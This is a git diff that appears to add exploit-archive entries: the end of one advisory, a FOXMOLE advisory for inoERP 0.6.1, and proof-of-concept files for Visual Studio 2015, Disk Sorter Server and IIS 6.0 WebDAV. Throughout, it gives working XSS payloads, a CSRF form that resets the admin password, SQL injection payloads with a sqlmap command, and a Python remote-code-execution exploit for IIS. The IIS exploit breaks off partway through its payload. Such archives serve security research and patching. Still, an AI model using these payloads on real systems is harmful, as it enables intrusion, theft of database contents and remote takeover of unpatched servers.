+Thank you to EON for the fast response.
+
+## Solution
+
+Update to version 5.1.
+
+## Affected versions
+
+* Version <= 5.0
+
+## Credits
+
+* Nicolas SERRA <n.serra@sysdream.com>
+
+-- SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
\ No newline at end of file
diff --git a/platforms/php/webapps/41749.txt b/platforms/php/webapps/41749.txt
new file mode 100755
index 000000000..a48e4d168
--- /dev/null
+++ b/platforms/php/webapps/41749.txt
@@ -0,0 +1,157 @@
+=== FOXMOLE - Security Advisory 2017-01-25 ===
+
+inoERP  - Multiple Issues
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Affected Versions
+=================
+inoERP 0.6.1
+
+Issue Overview
+==============
+Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
+Technical Risk: critical
+Likelihood of Exploitation: medium
+Vendor: inoERP
+Vendor URL: http://inoideas.org/  /  https://github.com/inoerp/inoERP
+Credits: FOXMOLE employee Tim Herres
+Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
+Advisory Status: Public
+OVE-ID: OVE-20170126-0002
+CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+
+Impact
+======
+There are multiple SQL Injection vulnerabilities, exploitable without authentication.
+An attacker could use the SQL Injection to access the database in an unsafe way.
+This means there is a high impact to all applications.
+The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
+
+
+Issue Description
+=================
+The following findings are only examples, there are quite more. The whole application should be reviewed.
+
+All items tested using FF52.
+
+1.) Cross Site Scripting:
+Stored:
+Create a new Question in the -->Forum --> Ask a question
+Vulnerable fields : Title, Content
+Used Payload: Test<script>alert("xss")</script>
+
+Response:
+[...]
+ <title>Test<script>alert("xss")</script> - inoERP!</title>
+[...]
+
+The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
+
+Reflected:
+With Auth:
+http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
+http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
+%3C/scRipt%3E
+http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
+
+Unauthenticated:
+http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
+
+2.) No protection against Cross Site Request Forgery Attacks:
+PoC: Changing the admin user credentials.
+
+<html>
+<body>
+    <form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
+      <input type="hidden" name="headerData&#91;0&#93;&#91;name&#93;" value="user&#95;id&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;0&#93;&#91;value&#93;" value="1" />
+      <input type="hidden" name="headerData&#91;1&#93;&#91;name&#93;" value="username&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;1&#93;&#91;value&#93;" value="inoerp" />
+      <input type="hidden" name="headerData&#91;2&#93;&#91;name&#93;" value="enteredPassword&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;2&#93;&#91;value&#93;" value="test" />
+      <input type="hidden" name="headerData&#91;3&#93;&#91;name&#93;" value="enteredRePassword&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;3&#93;&#91;value&#93;" value="test" />
+      <input type="hidden" name="headerData&#91;4&#93;&#91;name&#93;" value="first&#95;name&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;4&#93;&#91;value&#93;" value="inoerp" />
+      <input type="hidden" name="headerData&#91;5&#93;&#91;name&#93;" value="last&#95;name&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;5&#93;&#91;value&#93;" value="inoerp" />
+      <input type="hidden" name="headerData&#91;6&#93;&#91;name&#93;" value="email&#91;&#93;" />
+      <input type="hidden" name="headerData&#91;6&#93;&#91;value&#93;" value="inoerp&#64;no&#45;site&#46;com" />
+      <input type="hidden" name="headerData&#91;7&#93;&#91;name&#93;" value="phone&#91;&#93;" />
+[..snipped...]
+
+If a privileged user activates the request, the admin user id=1 is set to "test".
+
+3.) SQL Injection:
+Auth required:No
+#####
+http://192.168.241.143/inoerp/form.php?
+Parameter: module_code (GET)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+    Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
+0x74657374 ELSE 0x28 END))-- qkmO
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
+COUNT(*),CONCAT(0x716b7a6271,(SELECT
+(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
+
+    Type: stacked queries
+    Title: MySQL > 5.0.11 stacked queries (comment)
+    Payload: module_code=test';SELECT SLEEP(5)#
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: module_code=test' OR SLEEP(5)-- STgC
+
+Exploitable using e.g. SQLMAP
+
+Blind SQL Injection:
+sqlmap -u
+"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
+ -p "content_type%5b%5d" --dbms="MySQL"
+Parameter: content_type[] (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: content_type[]=-8366' OR 7798=7798 AND
+'eanR'='eanR&search_text=3&search_document_list[]=all
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: content_type[]=test' OR SLEEP(5) AND
+'exIO'='exIO&search_text=3&search_document_list[]=all
+#####
+
+4.) Session Fixation:
+After a successful login the SessionID PHPSESSID remains the same:
+Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
+After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
+
+
+
+
+Temporary Workaround and Fix
+============================
+FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
+
+
+
+History
+=======
+2017-01-25  Issue discovered
+2017-01-26  Vendor contacted -> no response
+2017-02-20  Vendor contacted again -> no response
+2017-03-06  Vendor contacted again -> no response
+2017-03-27  Advisory Release
+
+
+GPG Signature
+=============
+This advisory is signed with the GPG key of the FOXMOLE advisories team.
+The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
\ No newline at end of file
diff --git a/platforms/windows/dos/41734.c b/platforms/windows/dos/41734.c
new file mode 100755
index 000000000..c99ba4ac9
--- /dev/null
+++ b/platforms/windows/dos/41734.c
@@ -0,0 +1,177 @@
+# Exploit Title: Microsoft Visual Studio 2015 update 3 – Stack overflow
+# Date: 2017-03-26
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15
+# Version: Visual Studio 2015 update 3
+# Tested on: Windows 7 Pro SP1 x64, Windows 10 Pro x64
+
+ 
+
+Windbg output
+
+ 
+
+Crash 1:
+
+ 
+
+eax=1469f040 ebx=00000000 ecx=1469f040 edx=165f4634 esi=1469f040 edi=0036e2d8
+
+eip=16610c9d esp=00279000 ebp=0027900c iopl=0         nv up ei pl zr na pe nc
+
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+
+ 
+
+VCProject!CVCNode::GetVCProject+0x49:
+
+ 
+
+16610c9d ff523c          call    dword ptr [edx+3Ch]  ds:002b:165f4670={VCProject!CVCNode::GetVCProject (16610c64)}
+
+ 
+
+ 
+
+0:000> !exchain
+
+0036e2dc: VCProject!memcmp+86f5 (166956e8)
+
+0036e30c: VCProject!memcmp+876b (166957b0)
+
+0036e384: msenv!_aulldiv+476d1 (31e3d818)
+
+0036e424: msenv!_aulldiv+1567e (31df2c66)
+
+0036e478: msenv!_aulldiv+65abf (31e6a010)
+
+0036e4c4: vcpkg!sqlite3_value_type+1f3a (3940ac50)
+
+0036e530: msenv!_aulldiv+2b169 (31e135dc)
+
+0036e578: msenv!_aulldiv+2bb07 (31e145ac)
+
+0036e5cc: msenv!_aulldiv+2b1de (31e136ca)
+
+ 
+
+0:000> k
+
+# ChildEBP RetAddr 
+
+00 0027900c 16610ca0 VCProject!CVCNode::GetVCProject+0x49
+
+01 00279020 16610ca0 VCProject!CVCNode::GetVCProject+0x53
+
+02 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53
+
+…
+
+ff 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53
+
+ 
+
+ 
+
+ 
+
+Crash 2:
+
+ 
+
+(10cc.1970): CLR exception - code e0434352 (first chance)
+
+ 
+
+(10cc.1970): Stack overflow - code c00000fd (first chance)
+
+ 
+
+eax=08675cf0 ebx=00000000 ecx=08675cf0 edx=39784634 esi=08675cf0 edi=0043e0f0
+
+eip=397a0c68 esp=00349000 ebp=00349004 iopl=0         nv up ei pl zr na pe nc
+
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+
+ 
+
+VCProject!CVCNode::GetVCProject+0x4:
+
+397a0c68 57              push    edi
+
+ 
+
+0:000> !exchain
+
+0043e0f4: VCProject!memcmp+86f5 (398256e8)
+
+0043e124: VCProject!memcmp+876b (398257b0)
+
+0043e19c: msenv!_aulldiv+476d1 (51e1d818)
+
+0043e23c: msenv!_aulldiv+1567e (51dd2c66)
+
+0043e290: msenv!_aulldiv+65abf (51e4a010)
+
+0043e2dc: vcpkg!sqlite3_value_type+1f3a (390bac50)
+
+0043e348: msenv!_aulldiv+2b169 (51df35dc)
+
+0043e390: msenv!_aulldiv+2bb07 (51df45ac)
+
+0043e3e4: msenv!_aulldiv+2b1de (51df36ca)
+
+ 
+
+15a0a150  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a151  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a152  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a153  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a154  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a155  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a156  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+15a0a157  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+ 
+
+ 
+
+Peter
+
+ 
+
+crash.c
+
+// Exploit Title : Microsoft Visual Studio 2015 update 3 – Stack overflow
+// Date : 2017 - 03 - 26
+// Exploit Author : Peter Baris
+// Vendor Homepage : http://www.saptech-erp.com.au
+// Software Link : https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15
+// Version : 2015 update 3
+// Tested on : Windows 7 Pro SP1 x64, Windows 10 Pro x64
+
+// 2017-03-05 Reported to Microsoft
+// a few ignorant messages from microsoft, stating that this is not causing data loss
+// I have sent explanation about ctrl-s key combination
+// 2017-03-26 Publishing
+
+
+// Procedure to trigger the vulnerability
+// Open the c source file simply by double clicing it
+// In the properties windows change "Included In Project" to False -> click back to your source code's window
+
+#include <Windows.h>
+
+int main()
+{
+
+	printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+}
\ No newline at end of file
diff --git a/platforms/windows/dos/41737.txt b/platforms/windows/dos/41737.txt
new file mode 100755
index 000000000..1d868fd2d
--- /dev/null
+++ b/platforms/windows/dos/41737.txt
@@ -0,0 +1,51 @@
+[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow
+[+] Credits / Discovery: Nassim Asrir
+[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
+[+] Author Company: Henceforth
+[+] CVE: N/A
+
+Vendor:
+===============
+
+http://www.disksorter.com/
+  
+ 
+Download:
+===========
+
+http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe
+ 
+ 
+Vulnerability Type:
+===================
+
+local stack-based buffer overflow
+
+
+POC:
+===================
+
+Launch the program click on :
+
+1 - Server 
+
+2 - Connect
+
+3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture.
+
+CVE Reference:
+===============
+
+N/A
+ 
+ 
+Tested on:
+=============== 
+
+Windows 7
+
+Win xp 
+
+
+ 
+ 
diff --git a/platforms/windows/remote/41738.py b/platforms/windows/remote/41738.py
new file mode 100755
index 000000000..8df257d66
--- /dev/null
+++ b/platforms/windows/remote/41738.py
@@ -0,0 +1,45 @@
+'''
+Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
+
+Additional Information: the ScStoragePathFromUrl function is called twice
+Vulnerability Type: Buffer overflow
+Vendor of Product: Microsoft
+Affected Product Code Base: Windows Server 2003 R2
+Affected Component: ScStoragePathFromUrl
+Attack Type: Remote
+Impact Code execution: true
+Attack Vectors: crafted PROPFIND data
+
+Has vendor confirmed or acknowledged the vulnerability?:true
+
+Discoverer:Zhiniang Peng and Chen Wu.
+Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
+'''
+
+#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
+#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China 
+#-----------Email: edwardz@foxmail.com
+
+import socket  
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
+sock.connect(('127.0.0.1',80))  
+
+pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
+pay+='If: <http://localhost/aaaaaaa'
+pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\x